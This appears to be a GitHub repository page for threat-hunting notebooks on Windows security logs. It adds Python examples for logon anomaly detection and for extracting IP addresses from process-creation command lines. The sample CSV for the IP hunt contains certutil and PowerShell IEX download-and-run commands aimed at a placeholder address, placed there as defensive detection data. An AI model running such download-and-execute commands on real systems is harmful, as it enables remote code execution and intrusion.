Repository with Sample threat hunting notebooks on Security Event Log Data Sources
Repository files:

  • rawdata/
  • Azure Data Explorer Python Demo.ipynb
  • Azure Data Explorer- Kqlmagic Demo.ipynb (commit: "Added kqlmagic demo - Jupyter extension for Azure Data Explorer", Jan 11, 2019)
  • Azure Data Lake with anomalize R Demo.ipynb (commit: "Demo Files from Secureworld presentation", Nov 9, 2018)
  • README.md
  • threat-hunting-with-ipaddress-from-logs-Public.ipynb (commit: "demo notebook with ip address in logs", Feb 22, 2019)

threat-hunting-with-notebooks

Demo files associated with "Threat Hunting with Notebook technologies", presented at the SecureWorld conference in Seattle, WA:
https://events.secureworldexpo.com/agenda/seattle-wa-2018/

Presentation: https://www.slideshare.net/ashwin_patil/threat-hunting-using-notebook-technologies

GitHub's built-in notebook viewer does not render these notebooks well. Use an online service such as nbviewer (https://nbviewer.jupyter.org) or mybinder (https://mybinder.org/) to view and interact with the notebooks by providing the GitHub notebook or repository URL.

The same repo is also cloned and available on Azure Notebooks:
https://notebooks.azure.com/ashwinrp/projects/threat-hunting-with-notebooks

Basic data analysis and visualization on failed logon data

  • Data source: Azure Data Explorer
  • Language: Python


Time series anomaly detection on successful logon data using the anomalize R package

  • Data source: Azure Data Lake
  • Language: R
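The anomalize package works by decomposing a series into trend, seasonal and remainder components and then flagging outliers in the remainder. The following is an added example, not code from this repository's notebook, that applies the same idea in Python with only the standard library: the seasonal baseline is the median count per hour of day, and remainders are scored with a median/MAD robust z-score so that one large spike cannot inflate its own threshold. The hourly logon counts, the diurnal baseline and the injected 03:00 burst are all constructed for illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def make_sample():
    """Constructed data: hourly successful-logon counts over four days with a
    diurnal baseline (quiet at night, busy in business hours), small deterministic
    jitter, and one injected burst at 03:00 on the last day. Not real data."""
    start = datetime(2018, 11, 5)
    base = [5, 4, 4, 3, 4, 6, 20, 60, 110, 130, 125, 120,
            90, 120, 125, 115, 80, 40, 20, 12, 8, 6, 5, 5]
    rows = []
    for day in range(4):
        for hour in range(24):
            ts = start + timedelta(days=day, hours=hour)
            rows.append((ts, base[hour] + (day * 7 + hour * 3) % 5))
    burst_idx = 3 * 24 + 3            # fourth day, 03:00
    rows[burst_idx] = (rows[burst_idx][0], 95)
    return rows


def seasonal_baseline(rows):
    """Seasonal component: median count for each hour of day across all days."""
    by_hour = defaultdict(list)
    for ts, count in rows:
        by_hour[ts.hour].append(count)
    return {hour: statistics.median(counts) for hour, counts in by_hour.items()}


def detect_anomalies(rows, k=3.0):
    """Flag points whose remainder (count minus seasonal baseline) lies more
    than k robust standard deviations from the median remainder.

    Median and MAD are used instead of mean and stddev so that the spike being
    hunted does not raise the threshold that is supposed to catch it."""
    baseline = seasonal_baseline(rows)
    remainders = [count - baseline[ts.hour] for ts, count in rows]
    center = statistics.median(remainders)
    mad = statistics.median([abs(r - center) for r in remainders])
    scale = mad * 1.4826 or 1.0       # 1.4826 makes MAD comparable to stddev for normal data
    anomalies = []
    for (ts, count), r in zip(rows, remainders):
        score = (r - center) / scale
        if abs(score) > k:
            anomalies.append({"time": ts, "count": count,
                              "expected": baseline[ts.hour], "score": round(score, 1)})
    return anomalies


if __name__ == "__main__":
    for a in detect_anomalies(make_sample()):
        print(f"{a['time']:%Y-%m-%d %H:%M} count={a['count']} "
              f"expected={a['expected']} score={a['score']}")
```

With this input only the injected 03:00 burst is reported; the ordinary business-hour peaks are absorbed by the per-hour baseline, which is the reason to decompose before scoring rather than thresholding raw counts. The hour-of-day baseline assumes a daily cycle only; a series with a weekly pattern (weekend dips) would need the baseline keyed on (weekday, hour) as well.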


Threat hunting with IP addresses from logs

  • Data source: CSV file of Windows Security event 4688 (process creation) records that include the command line field
  • Language: Python
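Pulling addresses out of 4688 command lines is mostly a matter of separating dotted-quad candidates from real addresses and then labelling them against the organisation's own ranges. The following is an added example, not the notebook's own code: the CSV rows, hosts, users and addresses are constructed, the column names are an assumption about the export format, and the ORG_NETS ranges stand in for whatever address space the hunter actually owns.

```python
import csv
import io
import ipaddress
import re
from collections import Counter

# Constructed sample of Security event 4688 (process creation) records exported
# to CSV with the command line field. Column names are assumed; rows are made up.
SAMPLE_CSV = r"""TimeCreated,Computer,SubjectUserName,NewProcessName,CommandLine
2019-02-20T09:12:01Z,WS01,alice,C:\Windows\System32\PING.EXE,ping -n 2 10.0.0.12
2019-02-20T09:15:44Z,WS01,alice,C:\Windows\System32\cmd.exe,cmd /c net use \\10.0.0.40\share
2019-02-20T11:02:09Z,WS07,bob,C:\Windows\System32\certutil.exe,certutil -urlcache -split -f http://203.0.113.25/a.txt a.txt
2019-02-20T11:03:30Z,WS07,bob,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.25/s.ps1')
2019-02-20T12:00:00Z,WS02,svc_backup,C:\Program Files\Backup\agent.exe,agent.exe --build 1.2.3.4.5
2019-02-20T13:20:12Z,WS03,carol,C:\Windows\System32\notepad.exe,notepad.exe notes.txt
2019-02-20T13:25:51Z,WS03,carol,C:\Windows\System32\PING.EXE,ping -n 1 10.0.0.999
"""

# Dotted-quad candidates only; the lookarounds stop a match inside a longer
# dotted string such as a five-part build number.
IPV4_CANDIDATE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Assumed organisation address space used for internal/external labelling.
ORG_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]


def extract_ips(command_line):
    """Return the distinct valid IPv4 addresses in a command line, in order.

    The regex only finds candidates; ipaddress.ip_address() does the real
    validation, so '10.0.0.999' is dropped and '1.2.3.4.5' never matches."""
    found = []
    for candidate in IPV4_CANDIDATE.findall(command_line):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:
            continue
        if ip not in found:
            found.append(ip)
    return found


def scope(ip):
    """Label an address relative to the assumed organisation ranges."""
    return "internal" if any(ip in net for net in ORG_NETS) else "external"


def hunt(csv_text):
    """Return one record per (event, address) pair plus a hit count per address."""
    events, per_ip = [], Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        for ip in extract_ips(row["CommandLine"]):
            per_ip[str(ip)] += 1
            events.append({
                "time": row["TimeCreated"],
                "host": row["Computer"],
                "user": row["SubjectUserName"],
                "process": row["NewProcessName"].rsplit("\\", 1)[-1].lower(),
                "ip": str(ip),
                "scope": scope(ip),
            })
    return events, per_ip


def external_events(events):
    """The usual first pivot: processes that referenced an address outside the
    organisation's own ranges."""
    return [e for e in events if e["scope"] == "external"]


if __name__ == "__main__":
    events, per_ip = hunt(SAMPLE_CSV)
    for e in external_events(events):
        print(f"{e['time']} {e['host']} {e['user']} {e['process']} -> {e['ip']}")
    print(per_ip.most_common())
```

On the sample rows the external pivot surfaces the certutil and powershell downloads from the same address while the ping and net use entries stay in the internal bucket. One caveat the validation cannot remove: a four-part version string such as 2.3.4.5 is also a syntactically valid address, so hits of that shape still need the surrounding command line read before being treated as network activity.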